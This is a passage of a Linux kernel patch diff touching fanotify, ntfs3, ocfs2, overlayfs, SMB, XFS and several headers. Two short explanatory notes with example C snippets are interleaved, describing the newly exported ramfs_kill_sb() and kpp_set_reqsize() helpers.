++	 * like pipe_mnt, because that would subscribe to events on all the
++	 * anonymous pipes in the system.
++	 *
++	 * SB_NOUSER covers all of the internal pseudo fs whose objects are not
++	 * exposed to user's mount namespace, but there are other SB_KERNMOUNT
++	 * fs, like nsfs, debugfs, for which the value of allowing sb and mount
++	 * mark is questionable. For now we leave them alone.
++	 */
++	if (mark_type != FAN_MARK_INODE &&
++	    path->mnt->mnt_sb->s_flags & SB_NOUSER)
++		return -EINVAL;
++
+ 	/*
+ 	 * We shouldn't have allowed setting dirent events and the directory
+ 	 * flags FAN_ONDIR and FAN_EVENT_ON_CHILD in mask of non-dir inode,
+diff --git a/fs/ntfs3/xattr.c b/fs/ntfs3/xattr.c
+index ea582b4fe1d9d..88866bcd1a218 100644
+--- a/fs/ntfs3/xattr.c
++++ b/fs/ntfs3/xattr.c
+@@ -178,6 +178,9 @@ static ssize_t ntfs_list_ea(struct ntfs_inode *ni, char *buffer,
+ 	for (ret = 0, off = 0; off < size; off += unpacked_ea_size(ea)) {
+ 		ea = Add2Ptr(ea_all, off);
+ 
++		if (!ea->name_len)
++			break;
++
+ 		if (buffer) {
+ 			if (ret + ea->name_len + 1 > bytes_per_buffer) {
+ 				err = -ERANGE;
+diff --git a/fs/ocfs2/cluster/tcp.c b/fs/ocfs2/cluster/tcp.c
+index 785cabd71d670..4e083e25d0e7d 100644
+--- a/fs/ocfs2/cluster/tcp.c
++++ b/fs/ocfs2/cluster/tcp.c
+@@ -2083,18 +2083,24 @@ void o2net_stop_listening(struct o2nm_node *node)
+ 
+ int o2net_init(void)
+ {
++	struct folio *folio;
++	void *p;
+ 	unsigned long i;
+ 
+ 	o2quo_init();
+-
+ 	o2net_debugfs_init();
+ 
+-	o2net_hand = kzalloc(sizeof(struct o2net_handshake), GFP_KERNEL);
+-	o2net_keep_req = kzalloc(sizeof(struct o2net_msg), GFP_KERNEL);
+-	o2net_keep_resp = kzalloc(sizeof(struct o2net_msg), GFP_KERNEL);
+-	if (!o2net_hand || !o2net_keep_req || !o2net_keep_resp)
++	folio = folio_alloc(GFP_KERNEL | __GFP_ZERO, 0);
++	if (!folio)
+ 		goto out;
+ 
++	p = folio_address(folio);
++	o2net_hand = p;
++	p += sizeof(struct o2net_handshake);
++	o2net_keep_req = p;
++	p += sizeof(struct o2net_msg);
++	o2net_keep_resp = p;
++
+ 	o2net_hand->protocol_version = cpu_to_be64(O2NET_PROTOCOL_VERSION);
+ 	o2net_hand->connector_id = cpu_to_be64(1);
+ 
+@@ -2120,9 +2126,6 @@ int o2net_init(void)
+ 	return 0;
+ 
+ out:
+-	kfree(o2net_hand);
+-	kfree(o2net_keep_req);
+-	kfree(o2net_keep_resp);
+ 	o2net_debugfs_exit();
+ 	o2quo_exit();
+ 	return -ENOMEM;
+@@ -2131,8 +2134,6 @@ out:
+ void o2net_exit(void)
+ {
+ 	o2quo_exit();
+-	kfree(o2net_hand);
+-	kfree(o2net_keep_req);
+-	kfree(o2net_keep_resp);
+ 	o2net_debugfs_exit();
++	folio_put(virt_to_folio(o2net_hand));
+ }
+diff --git a/fs/overlayfs/copy_up.c b/fs/overlayfs/copy_up.c
+index 91a95bfad0d1c..edc1ebff33f5a 100644
+--- a/fs/overlayfs/copy_up.c
++++ b/fs/overlayfs/copy_up.c
+@@ -538,6 +538,7 @@ static int ovl_link_up(struct ovl_copy_up_ctx *c)
+ 			/* Restore timestamps on parent (best effort) */
+ 			ovl_set_timestamps(ofs, upperdir, &c->pstat);
+ 			ovl_dentry_set_upper_alias(c->dentry);
++			ovl_dentry_update_reval(c->dentry, upper);
+ 		}
+ 	}
+ 	inode_unlock(udir);
+@@ -857,6 +858,7 @@ static int ovl_do_copy_up(struct ovl_copy_up_ctx *c)
+ 		inode_unlock(udir);
+ 
+ 		ovl_dentry_set_upper_alias(c->dentry);
++		ovl_dentry_update_reval(c->dentry, ovl_dentry_upper(c->dentry));
+ 	}
+ 
+ out:
+diff --git a/fs/overlayfs/dir.c b/fs/overlayfs/dir.c
+index c3032cef391ef..5339ff08bd0f4 100644
+--- a/fs/overlayfs/dir.c
++++ b/fs/overlayfs/dir.c
+@@ -269,8 +269,7 @@ static int ovl_instantiate(struct dentry *dentry, struct inode *inode,
+ 
+ 	ovl_dir_modified(dentry->d_parent, false);
+ 	ovl_dentry_set_upper_alias(dentry);
+-	ovl_dentry_update_reval(dentry, newdentry,
+-			DCACHE_OP_REVALIDATE | DCACHE_OP_WEAK_REVALIDATE);
++	ovl_dentry_init_reval(dentry, newdentry);
+ 
+ 	if (!hardlink) {
+ 		/*
+diff --git a/fs/overlayfs/export.c b/fs/overlayfs/export.c
+index ac9c3ad04016e..e55363d343dc6 100644
+--- a/fs/overlayfs/export.c
++++ b/fs/overlayfs/export.c
+@@ -326,8 +326,7 @@ static struct dentry *ovl_obtain_alias(struct super_block *sb,
+ 	if (upper_alias)
+ 		ovl_dentry_set_upper_alias(dentry);
+ 
+-	ovl_dentry_update_reval(dentry, upper,
+-			DCACHE_OP_REVALIDATE | DCACHE_OP_WEAK_REVALIDATE);
++	ovl_dentry_init_reval(dentry, upper);
+ 
+ 	return d_instantiate_anon(dentry, inode);
+ 
+diff --git a/fs/overlayfs/namei.c b/fs/overlayfs/namei.c
+index 0fd1d5fdfc728..655d08d6f3f17 100644
+--- a/fs/overlayfs/namei.c
++++ b/fs/overlayfs/namei.c
+@@ -1116,8 +1116,7 @@ struct dentry *ovl_lookup(struct inode *dir, struct dentry *dentry,
+ 			ovl_set_flag(OVL_UPPERDATA, inode);
+ 	}
+ 
+-	ovl_dentry_update_reval(dentry, upperdentry,
+-			DCACHE_OP_REVALIDATE | DCACHE_OP_WEAK_REVALIDATE);
++	ovl_dentry_init_reval(dentry, upperdentry);
+ 
+ 	revert_creds(old_cred);
+ 	if (origin_path) {
+diff --git a/fs/overlayfs/overlayfs.h b/fs/overlayfs/overlayfs.h
+index e74a610a117ec..052226aa7de09 100644
+--- a/fs/overlayfs/overlayfs.h
++++ b/fs/overlayfs/overlayfs.h
+@@ -360,8 +360,10 @@ bool ovl_index_all(struct super_block *sb);
+ bool ovl_verify_lower(struct super_block *sb);
+ struct ovl_entry *ovl_alloc_entry(unsigned int numlower);
+ bool ovl_dentry_remote(struct dentry *dentry);
+-void ovl_dentry_update_reval(struct dentry *dentry, struct dentry *upperdentry,
+-			     unsigned int mask);
++void ovl_dentry_update_reval(struct dentry *dentry, struct dentry *realdentry);
++void ovl_dentry_init_reval(struct dentry *dentry, struct dentry *upperdentry);
++void ovl_dentry_init_flags(struct dentry *dentry, struct dentry *upperdentry,
++			   unsigned int mask);
+ bool ovl_dentry_weird(struct dentry *dentry);
+ enum ovl_path_type ovl_path_type(struct dentry *dentry);
+ void ovl_path_upper(struct dentry *dentry, struct path *path);
+diff --git a/fs/overlayfs/super.c b/fs/overlayfs/super.c
+index 3d14a3f1465d1..51eec4a8e82b2 100644
+--- a/fs/overlayfs/super.c
++++ b/fs/overlayfs/super.c
+@@ -1980,7 +1980,7 @@ static struct dentry *ovl_get_root(struct super_block *sb,
+ 	ovl_dentry_set_flag(OVL_E_CONNECTED, root);
+ 	ovl_set_upperdata(d_inode(root));
+ 	ovl_inode_init(d_inode(root), &oip, ino, fsid);
+-	ovl_dentry_update_reval(root, upperdentry, DCACHE_OP_WEAK_REVALIDATE);
++	ovl_dentry_init_flags(root, upperdentry, DCACHE_OP_WEAK_REVALIDATE);
+ 
+ 	return root;
+ }
+diff --git a/fs/overlayfs/util.c b/fs/overlayfs/util.c
+index 81a57a8d80d9a..850e8d1bf8296 100644
+--- a/fs/overlayfs/util.c
++++ b/fs/overlayfs/util.c
+@@ -94,14 +94,30 @@ struct ovl_entry *ovl_alloc_entry(unsigned int numlower)
+ 	return oe;
+ }
+ 
++#define OVL_D_REVALIDATE (DCACHE_OP_REVALIDATE | DCACHE_OP_WEAK_REVALIDATE)
++
+ bool ovl_dentry_remote(struct dentry *dentry)
+ {
+-	return dentry->d_flags &
+-		(DCACHE_OP_REVALIDATE | DCACHE_OP_WEAK_REVALIDATE);
++	return dentry->d_flags & OVL_D_REVALIDATE;
++}
++
++void ovl_dentry_update_reval(struct dentry *dentry, struct dentry *realdentry)
++{
++	if (!ovl_dentry_remote(realdentry))
++		return;
++
++	spin_lock(&dentry->d_lock);
++	dentry->d_flags |= realdentry->d_flags & OVL_D_REVALIDATE;
++	spin_unlock(&dentry->d_lock);
++}
++
++void ovl_dentry_init_reval(struct dentry *dentry, struct dentry *upperdentry)
++{
++	return ovl_dentry_init_flags(dentry, upperdentry, OVL_D_REVALIDATE);
+ }
+ 
+-void ovl_dentry_update_reval(struct dentry *dentry, struct dentry *upperdentry,
+-			     unsigned int mask)
++void ovl_dentry_init_flags(struct dentry *dentry, struct dentry *upperdentry,
++			   unsigned int mask)
+ {
+ 	struct ovl_entry *oe = OVL_E(dentry);
+ 	unsigned int i, flags = 0;
+diff --git a/fs/pstore/ram_core.c b/fs/pstore/ram_core.c
+index 8bf09886e7e66..2384de1c2d187 100644
+--- a/fs/pstore/ram_core.c
++++ b/fs/pstore/ram_core.c
+@@ -591,6 +591,8 @@ struct persistent_ram_zone *persistent_ram_new(phys_addr_t start, size_t size,
+ 	raw_spin_lock_init(&prz->buffer_lock);
+ 	prz->flags = flags;
+ 	prz->label = kstrdup(label, GFP_KERNEL);
++	if (!prz->label)
++		goto err;
+ 
+ 	ret = persistent_ram_buffer_map(start, size, prz, memtype);
+ 	if (ret)
+diff --git a/fs/ramfs/inode.c b/fs/ramfs/inode.c
+index b3257e8528200..f368a16906fb4 100644
+--- a/fs/ramfs/inode.c
++++ b/fs/ramfs/inode.c
+@@ -278,7 +278,7 @@ int ramfs_init_fs_context(struct fs_context *fc)
+ 	return 0;
+ }
+ 
+-static void ramfs_kill_sb(struct super_block *sb)
++void ramfs_kill_sb(struct super_block *sb)
+ {
+ 	kfree(sb->s_fs_info);
+ 	kill_litter_super(sb);
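
Making ramfs_kill_sb() non-static (and declaring it in <linux/ramfs.h>
below) lets filesystems built on ramfs tear down their superblock with the
same helper that frees the s_fs_info allocated by ramfs_init_fs_context().
A minimal sketch of such a consumer, with a hypothetical fs name:

	#include <linux/fs.h>
	#include <linux/ramfs.h>

	static struct file_system_type examplefs_type = {
		.name		 = "examplefs",
		.init_fs_context = ramfs_init_fs_context, /* allocates s_fs_info */
		.kill_sb	 = ramfs_kill_sb,	   /* frees it again */
	};
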
+diff --git a/fs/smb/client/file.c b/fs/smb/client/file.c
+index 87dcffece7623..9a367d4c74e47 100644
+--- a/fs/smb/client/file.c
++++ b/fs/smb/client/file.c
+@@ -5140,20 +5140,19 @@ oplock_break_ack:
+ 
+ 	_cifsFileInfo_put(cfile, false /* do not wait for ourself */, false);
+ 	/*
+-	 * releasing stale oplock after recent reconnect of smb session using
+-	 * a now incorrect file handle is not a data integrity issue but do
+-	 * not bother sending an oplock release if session to server still is
+-	 * disconnected since oplock already released by the server
++	 * MS-SMB2 3.2.5.19.1 and 3.2.5.19.2 (and MS-CIFS 3.2.5.42) do not require
++	 * an acknowledgment to be sent when the file has already been closed.
++	 * Check for a NULL server, since this can race with kill_sb calling
++	 * tree disconnect.
+ 	 */
+-	if (!oplock_break_cancelled) {
+-		/* check for server null since can race with kill_sb calling tree disconnect */
+-		if (tcon->ses && tcon->ses->server) {
+-			rc = tcon->ses->server->ops->oplock_response(tcon, persistent_fid,
+-				volatile_fid, net_fid, cinode);
+-			cifs_dbg(FYI, "Oplock release rc = %d\n", rc);
+-		} else
+-			pr_warn_once("lease break not sent for unmounted share\n");
+-	}
++	spin_lock(&cinode->open_file_lock);
++	if (tcon->ses && tcon->ses->server && !oplock_break_cancelled &&
++					!list_empty(&cinode->openFileList)) {
++		spin_unlock(&cinode->open_file_lock);
++		rc = tcon->ses->server->ops->oplock_response(tcon, persistent_fid,
++						volatile_fid, net_fid, cinode);
++		cifs_dbg(FYI, "Oplock release rc = %d\n", rc);
++	} else
++		spin_unlock(&cinode->open_file_lock);
+ 
+ 	cifs_done_oplock_break(cinode);
+ }
+diff --git a/fs/smb/client/smb2inode.c b/fs/smb/client/smb2inode.c
+index c97e049e29dd3..5ddc629e62168 100644
+--- a/fs/smb/client/smb2inode.c
++++ b/fs/smb/client/smb2inode.c
+@@ -397,9 +397,6 @@ static int smb2_compound_op(const unsigned int xid, struct cifs_tcon *tcon,
+ 					rsp_iov);
+ 
+  finished:
+-	if (cfile)
+-		cifsFileInfo_put(cfile);
+-
+ 	SMB2_open_free(&rqst[0]);
+ 	if (rc == -EREMCHG) {
+ 		pr_warn_once("server share %s deleted\n", tcon->tree_name);
+@@ -513,6 +510,9 @@ static int smb2_compound_op(const unsigned int xid, struct cifs_tcon *tcon,
+ 		break;
+ 	}
+ 
++	if (cfile)
++		cifsFileInfo_put(cfile);
++
+ 	if (rc && err_iov && err_buftype) {
+ 		memcpy(err_iov, rsp_iov, 3 * sizeof(*err_iov));
+ 		memcpy(err_buftype, resp_buftype, 3 * sizeof(*err_buftype));
+@@ -592,9 +592,6 @@ int smb2_query_path_info(const unsigned int xid, struct cifs_tcon *tcon,
+ 			if (islink)
+ 				rc = -EREMOTE;
+ 		}
+-		if (rc == -EREMOTE && IS_ENABLED(CONFIG_CIFS_DFS_UPCALL) && cifs_sb &&
+-		    (cifs_sb->mnt_cifs_flags & CIFS_MOUNT_NO_DFS))
+-			rc = -EOPNOTSUPP;
+ 	}
+ 
+ out:
+diff --git a/fs/smb/client/smb2ops.c b/fs/smb/client/smb2ops.c
+index d512440d35b6f..e6a191a7499e8 100644
+--- a/fs/smb/client/smb2ops.c
++++ b/fs/smb/client/smb2ops.c
+@@ -208,6 +208,16 @@ smb2_wait_mtu_credits(struct TCP_Server_Info *server, unsigned int size,
+ 
+ 	spin_lock(&server->req_lock);
+ 	while (1) {
++		spin_unlock(&server->req_lock);
++
++		spin_lock(&server->srv_lock);
++		if (server->tcpStatus == CifsExiting) {
++			spin_unlock(&server->srv_lock);
++			return -ENOENT;
++		}
++		spin_unlock(&server->srv_lock);
++
++		spin_lock(&server->req_lock);
+ 		if (server->credits <= 0) {
+ 			spin_unlock(&server->req_lock);
+ 			cifs_num_waiters_inc(server);
+@@ -218,15 +228,6 @@ smb2_wait_mtu_credits(struct TCP_Server_Info *server, unsigned int size,
+ 				return rc;
+ 			spin_lock(&server->req_lock);
+ 		} else {
+-			spin_unlock(&server->req_lock);
+-			spin_lock(&server->srv_lock);
+-			if (server->tcpStatus == CifsExiting) {
+-				spin_unlock(&server->srv_lock);
+-				return -ENOENT;
+-			}
+-			spin_unlock(&server->srv_lock);
+-
+-			spin_lock(&server->req_lock);
+ 			scredits = server->credits;
+ 			/* can deadlock with reopen */
+ 			if (scredits <= 8) {
+diff --git a/fs/smb/client/transport.c b/fs/smb/client/transport.c
+index c961b90f92b9f..e03ffcf7e201c 100644
+--- a/fs/smb/client/transport.c
++++ b/fs/smb/client/transport.c
+@@ -549,6 +549,16 @@ wait_for_free_credits(struct TCP_Server_Info *server, const int num_credits,
+ 	}
+ 
+ 	while (1) {
++		spin_unlock(&server->req_lock);
++
++		spin_lock(&server->srv_lock);
++		if (server->tcpStatus == CifsExiting) {
++			spin_unlock(&server->srv_lock);
++			return -ENOENT;
++		}
++		spin_unlock(&server->srv_lock);
++
++		spin_lock(&server->req_lock);
+ 		if (*credits < num_credits) {
+ 			scredits = *credits;
+ 			spin_unlock(&server->req_lock);
+@@ -574,15 +584,6 @@ wait_for_free_credits(struct TCP_Server_Info *server, const int num_credits,
+ 				return -ERESTARTSYS;
+ 			spin_lock(&server->req_lock);
+ 		} else {
+-			spin_unlock(&server->req_lock);
+-
+-			spin_lock(&server->srv_lock);
+-			if (server->tcpStatus == CifsExiting) {
+-				spin_unlock(&server->srv_lock);
+-				return -ENOENT;
+-			}
+-			spin_unlock(&server->srv_lock);
+-
+ 			/*
+ 			 * For normal commands, reserve the last MAX_COMPOUND
+ 			 * credits to compound requests.
+@@ -596,7 +597,6 @@ wait_for_free_credits(struct TCP_Server_Info *server, const int num_credits,
+ 			 * for servers that are slow to hand out credits on
+ 			 * new sessions.
+ 			 */
+-			spin_lock(&server->req_lock);
+ 			if (!optype && num_credits == 1 &&
+ 			    server->in_flight > 2 * MAX_COMPOUND &&
+ 			    *credits <= MAX_COMPOUND) {
+diff --git a/fs/smb/server/smb_common.c b/fs/smb/server/smb_common.c
+index 05d7f3e910bf4..d937e2f45c829 100644
+--- a/fs/smb/server/smb_common.c
++++ b/fs/smb/server/smb_common.c
+@@ -536,7 +536,7 @@ int ksmbd_extract_shortname(struct ksmbd_conn *conn, const char *longname,
+ 	out[baselen + 3] = PERIOD;
+ 
+ 	if (dot_present)
+-		memcpy(&out[baselen + 4], extension, 4);
++		memcpy(out + baselen + 4, extension, 4);
+ 	else
+ 		out[baselen + 4] = '\0';
+ 	smbConvertToUTF16((__le16 *)shortname, out, PATH_MAX,
+diff --git a/fs/xfs/scrub/common.c b/fs/xfs/scrub/common.c
+index 9bbbf20f401b3..e71449658ecc3 100644
+--- a/fs/xfs/scrub/common.c
++++ b/fs/xfs/scrub/common.c
+@@ -865,29 +865,3 @@ xchk_ilock_inverted(
+ 	}
+ 	return -EDEADLOCK;
+ }
+-
+-/* Pause background reaping of resources. */
+-void
+-xchk_stop_reaping(
+-	struct xfs_scrub	*sc)
+-{
+-	sc->flags |= XCHK_REAPING_DISABLED;
+-	xfs_blockgc_stop(sc->mp);
+-	xfs_inodegc_stop(sc->mp);
+-}
+-
+-/* Restart background reaping of resources. */
+-void
+-xchk_start_reaping(
+-	struct xfs_scrub	*sc)
+-{
+-	/*
+-	 * Readonly filesystems do not perform inactivation or speculative
+-	 * preallocation, so there's no need to restart the workers.
+-	 */
+-	if (!xfs_is_readonly(sc->mp)) {
+-		xfs_inodegc_start(sc->mp);
+-		xfs_blockgc_start(sc->mp);
+-	}
+-	sc->flags &= ~XCHK_REAPING_DISABLED;
+-}
+diff --git a/fs/xfs/scrub/common.h b/fs/xfs/scrub/common.h
+index 454145db10e71..2ca80102e704a 100644
+--- a/fs/xfs/scrub/common.h
++++ b/fs/xfs/scrub/common.h
+@@ -148,7 +148,5 @@ static inline bool xchk_skip_xref(struct xfs_scrub_metadata *sm)
+ 
+ int xchk_metadata_inode_forks(struct xfs_scrub *sc);
+ int xchk_ilock_inverted(struct xfs_inode *ip, uint lock_mode);
+-void xchk_stop_reaping(struct xfs_scrub *sc);
+-void xchk_start_reaping(struct xfs_scrub *sc);
+ 
+ #endif	/* __XFS_SCRUB_COMMON_H__ */
+diff --git a/fs/xfs/scrub/fscounters.c b/fs/xfs/scrub/fscounters.c
+index 6a6f8fe7f87c0..88d6961e38866 100644
+--- a/fs/xfs/scrub/fscounters.c
++++ b/fs/xfs/scrub/fscounters.c
+@@ -128,13 +128,6 @@ xchk_setup_fscounters(
+ 	if (error)
+ 		return error;
+ 
+-	/*
+-	 * Pause background reclaim while we're scrubbing to reduce the
+-	 * likelihood of background perturbations to the counters throwing off
+-	 * our calculations.
+-	 */
+-	xchk_stop_reaping(sc);
+-
+ 	return xchk_trans_alloc(sc, 0);
+ }
+ 
+@@ -353,6 +346,12 @@ xchk_fscounters(
+ 	if (fdblocks > mp->m_sb.sb_dblocks)
+ 		xchk_set_corrupt(sc);
+ 
++	/*
++	 * XXX: We can't quiesce percpu counter updates, so exit early.
++	 * This can be re-enabled when we gain exclusive freeze functionality.
++	 */
++	return 0;
++
+ 	/*
+ 	 * If ifree exceeds icount by more than the minimum variance then
+ 	 * something's probably wrong with the counters.
+diff --git a/fs/xfs/scrub/scrub.c b/fs/xfs/scrub/scrub.c
+index 2e8e400f10a9a..95132490fda5e 100644
+--- a/fs/xfs/scrub/scrub.c
++++ b/fs/xfs/scrub/scrub.c
+@@ -171,8 +171,6 @@ xchk_teardown(
+ 	}
+ 	if (sc->sm->sm_flags & XFS_SCRUB_IFLAG_REPAIR)
+ 		mnt_drop_write_file(sc->file);
+-	if (sc->flags & XCHK_REAPING_DISABLED)
+-		xchk_start_reaping(sc);
+ 	if (sc->buf) {
+ 		kmem_free(sc->buf);
+ 		sc->buf = NULL;
+diff --git a/fs/xfs/scrub/scrub.h b/fs/xfs/scrub/scrub.h
+index 3de5287e98d84..4cb32c27df102 100644
+--- a/fs/xfs/scrub/scrub.h
++++ b/fs/xfs/scrub/scrub.h
+@@ -88,7 +88,6 @@ struct xfs_scrub {
+ 
+ /* XCHK state flags grow up from zero, XREP state flags grown down from 2^31 */
+ #define XCHK_TRY_HARDER		(1 << 0)  /* can't get resources, try again */
+-#define XCHK_REAPING_DISABLED	(1 << 2)  /* background block reaping paused */
+ #define XREP_ALREADY_FIXED	(1 << 31) /* checking our repair work */
+ 
+ /* Metadata scrubbers */
+diff --git a/fs/xfs/xfs_icache.c b/fs/xfs/xfs_icache.c
+index eae7427062cf9..d884cba1d7072 100644
+--- a/fs/xfs/xfs_icache.c
++++ b/fs/xfs/xfs_icache.c
+@@ -431,18 +431,23 @@ xfs_iget_check_free_state(
+ }
+ 
+ /* Make all pending inactivation work start immediately. */
+-static void
++static bool
+ xfs_inodegc_queue_all(
+ 	struct xfs_mount	*mp)
+ {
+ 	struct xfs_inodegc	*gc;
+ 	int			cpu;
++	bool			ret = false;
+ 
+ 	for_each_online_cpu(cpu) {
+ 		gc = per_cpu_ptr(mp->m_inodegc, cpu);
+-		if (!llist_empty(&gc->list))
++		if (!llist_empty(&gc->list)) {
+ 			mod_delayed_work_on(cpu, mp->m_inodegc_wq, &gc->work, 0);
++			ret = true;
++		}
+ 	}
++
++	return ret;
+ }
+ 
+ /*
+@@ -1848,6 +1853,8 @@ xfs_inodegc_worker(
+ 	struct llist_node	*node = llist_del_all(&gc->list);
+ 	struct xfs_inode	*ip, *n;
+ 
++	ASSERT(gc->cpu == smp_processor_id());
++
+ 	WRITE_ONCE(gc->items, 0);
+ 
+ 	if (!node)
+@@ -1892,24 +1899,41 @@ xfs_inodegc_flush(
+ 
+ /*
+  * Flush all the pending work and then disable the inode inactivation background
+- * workers and wait for them to stop.
++ * workers and wait for them to stop.  Caller must hold sb->s_umount to
++ * coordinate changes in the inodegc_enabled state.
+  */
+ void
+ xfs_inodegc_stop(
+ 	struct xfs_mount	*mp)
+ {
++	bool			rerun;
++
+ 	if (!xfs_clear_inodegc_enabled(mp))
+ 		return;
+ 
++	/*
++	 * Drain all pending inodegc work, including inodes that could be
++	 * queued by racing xfs_inodegc_queue or xfs_inodegc_shrinker_scan
++	 * threads that sample the inodegc state just prior to us clearing it.
++	 * The inodegc flag state prevents new threads from queuing more
++	 * inodes, so we queue pending work items and flush the workqueue until
++	 * all inodegc lists are empty.  IOWs, we cannot use drain_workqueue
++	 * here because it does not allow other unserialized mechanisms to
++	 * reschedule inodegc work while this draining is in progress.
++	 */
+ 	xfs_inodegc_queue_all(mp);
+-	drain_workqueue(mp->m_inodegc_wq);
++	do {
++		flush_workqueue(mp->m_inodegc_wq);
++		rerun = xfs_inodegc_queue_all(mp);
++	} while (rerun);
+ 
+ 	trace_xfs_inodegc_stop(mp, __return_address);
+ }
+ 
+ /*
+  * Enable the inode inactivation background workers and schedule deferred inode
+- * inactivation work if there is any.
++ * inactivation work if there is any.  Caller must hold sb->s_umount to
++ * coordinate changes in the inodegc_enabled state.
+  */
+ void
+ xfs_inodegc_start(
+@@ -2052,7 +2076,8 @@ xfs_inodegc_queue(
+ 		queue_delay = 0;
+ 
+ 	trace_xfs_inodegc_queue(mp, __return_address);
+-	mod_delayed_work(mp->m_inodegc_wq, &gc->work, queue_delay);
++	mod_delayed_work_on(current_cpu(), mp->m_inodegc_wq, &gc->work,
++			queue_delay);
+ 	put_cpu_ptr(gc);
+ 
+ 	if (xfs_inodegc_want_flush_work(ip, items, shrinker_hits)) {
+@@ -2096,7 +2121,8 @@ xfs_inodegc_cpu_dead(
+ 
+ 	if (xfs_is_inodegc_enabled(mp)) {
+ 		trace_xfs_inodegc_queue(mp, __return_address);
+-		mod_delayed_work(mp->m_inodegc_wq, &gc->work, 0);
++		mod_delayed_work_on(current_cpu(), mp->m_inodegc_wq, &gc->work,
++				0);
+ 	}
+ 	put_cpu_ptr(gc);
+ }
+diff --git a/fs/xfs/xfs_mount.h b/fs/xfs/xfs_mount.h
+index 8aca2cc173ac1..69ddd53196344 100644
+--- a/fs/xfs/xfs_mount.h
++++ b/fs/xfs/xfs_mount.h
+@@ -66,6 +66,9 @@ struct xfs_inodegc {
+ 	/* approximate count of inodes in the list */
+ 	unsigned int		items;
+ 	unsigned int		shrinker_hits;
++#if defined(DEBUG) || defined(XFS_WARN)
++	unsigned int		cpu;
++#endif
+ };
+ 
+ /*
+diff --git a/fs/xfs/xfs_super.c b/fs/xfs/xfs_super.c
+index ee4b429a2f2c9..4b179526913f4 100644
+--- a/fs/xfs/xfs_super.c
++++ b/fs/xfs/xfs_super.c
+@@ -1084,6 +1084,9 @@ xfs_inodegc_init_percpu(
+ 
+ 	for_each_possible_cpu(cpu) {
+ 		gc = per_cpu_ptr(mp->m_inodegc, cpu);
++#if defined(DEBUG) || defined(XFS_WARN)
++		gc->cpu = cpu;
++#endif
+ 		init_llist_head(&gc->list);
+ 		gc->items = 0;
+ 		INIT_DELAYED_WORK(&gc->work, xfs_inodegc_worker);
+diff --git a/include/crypto/internal/kpp.h b/include/crypto/internal/kpp.h
+index 9cb0662ebe871..31ff3c1986ef0 100644
+--- a/include/crypto/internal/kpp.h
++++ b/include/crypto/internal/kpp.h
+@@ -50,6 +50,12 @@ static inline void *kpp_request_ctx(struct kpp_request *req)
+ 	return req->__ctx;
+ }
+ 
++static inline void kpp_set_reqsize(struct crypto_kpp *kpp,
++				   unsigned int reqsize)
++{
++	crypto_kpp_alg(kpp)->reqsize = reqsize;
++}
++
+ static inline void *kpp_tfm_ctx(struct crypto_kpp *tfm)
+ {
+ 	return tfm->base.__crt_ctx;
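
kpp_set_reqsize() gives KPP implementations a setter for the per-request
context size, so the space later returned by kpp_request_ctx() is sized by
the driver itself. A sketch of the expected use from a driver's ->init()
callback (struct and function names are hypothetical):

	#include <crypto/internal/kpp.h>

	struct example_kpp_req_ctx {
		u8 scratch[64];		/* per-request working memory */
	};

	static int example_kpp_init_tfm(struct crypto_kpp *tfm)
	{
		/* Reserve room that kpp_request_ctx() hands back per request */
		kpp_set_reqsize(tfm, sizeof(struct example_kpp_req_ctx));
		return 0;
	}
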
+diff --git a/include/drm/drm_bridge.h b/include/drm/drm_bridge.h
+index 288c6feda5de2..6b656ea23b964 100644
+--- a/include/drm/drm_bridge.h
++++ b/include/drm/drm_bridge.h
+@@ -768,6 +768,14 @@ struct drm_bridge {
+ 	 * modes.
+ 	 */
+ 	bool interlace_allowed;
++	/**
++	 * @pre_enable_prev_first: The bridge requires that the prev
++	 * bridge @pre_enable function is called before its @pre_enable,
++	 * and conversely for post_disable. This is most frequently a
++	 * requirement for DSI devices which need the host to be initialised
++	 * before the peripheral.
++	 */
++	bool pre_enable_prev_first;
+ 	/**
+ 	 * @ddc: Associated I2C adapter for DDC access, if any.
+ 	 */
+diff --git a/include/drm/drm_fixed.h b/include/drm/drm_fixed.h
+index 553210c02ee0f..03cb890690e83 100644
+--- a/include/drm/drm_fixed.h
++++ b/include/drm/drm_fixed.h
+@@ -70,6 +70,7 @@ static inline u32 dfixed_div(fixed20_12 A, fixed20_12 B)
+ }
+ 
+ #define DRM_FIXED_POINT		32
++#define DRM_FIXED_POINT_HALF	16
+ #define DRM_FIXED_ONE		(1ULL << DRM_FIXED_POINT)
+ #define DRM_FIXED_DECIMAL_MASK	(DRM_FIXED_ONE - 1)
+ #define DRM_FIXED_DIGITS_MASK	(~DRM_FIXED_DECIMAL_MASK)
+@@ -86,6 +87,11 @@ static inline int drm_fixp2int(s64 a)
+ 	return ((s64)a) >> DRM_FIXED_POINT;
+ }
+ 
++static inline int drm_fixp2int_round(s64 a)
++{
++	return drm_fixp2int(a + (1 << (DRM_FIXED_POINT_HALF - 1)));
++}
++
+ static inline int drm_fixp2int_ceil(s64 a)
+ {
+ 	if (a > 0)
+diff --git a/include/linux/bitmap.h b/include/linux/bitmap.h
+index 7d6d73b781472..03644237e1efb 100644
+--- a/include/linux/bitmap.h
++++ b/include/linux/bitmap.h
+@@ -302,12 +302,10 @@ void bitmap_to_arr32(u32 *buf, const unsigned long *bitmap,
+ #endif
+ 
+ /*
+- * On 64-bit systems bitmaps are represented as u64 arrays internally. On LE32
+- * machines the order of hi and lo parts of numbers match the bitmap structure.
+- * In both cases conversion is not needed when copying data from/to arrays of
+- * u64.
++ * On 64-bit systems bitmaps are represented as u64 arrays internally. So,
++ * the conversion is not needed when copying data from/to arrays of u64.
+  */
+-#if (BITS_PER_LONG == 32) && defined(__BIG_ENDIAN)
++#if BITS_PER_LONG == 32
+ void bitmap_from_arr64(unsigned long *bitmap, const u64 *buf, unsigned int nbits);
+ void bitmap_to_arr64(u64 *buf, const unsigned long *bitmap, unsigned int nbits);
+ #else
+diff --git a/include/linux/blk-mq.h b/include/linux/blk-mq.h
+index a9764cbf7f8d2..e4f676e1042b5 100644
+--- a/include/linux/blk-mq.h
++++ b/include/linux/blk-mq.h
+@@ -745,8 +745,7 @@ struct request *blk_mq_alloc_request_hctx(struct request_queue *q,
+ struct blk_mq_tags {
+ 	unsigned int nr_tags;
+ 	unsigned int nr_reserved_tags;
+-
+-	atomic_t active_queues;
++	unsigned int active_queues;
+ 
+ 	struct sbitmap_queue bitmap_tags;
+ 	struct sbitmap_queue breserved_tags;
+diff --git a/include/linux/blkdev.h b/include/linux/blkdev.h
+index 891f8cbcd0436..427e79ac72194 100644
+--- a/include/linux/blkdev.h
++++ b/include/linux/blkdev.h
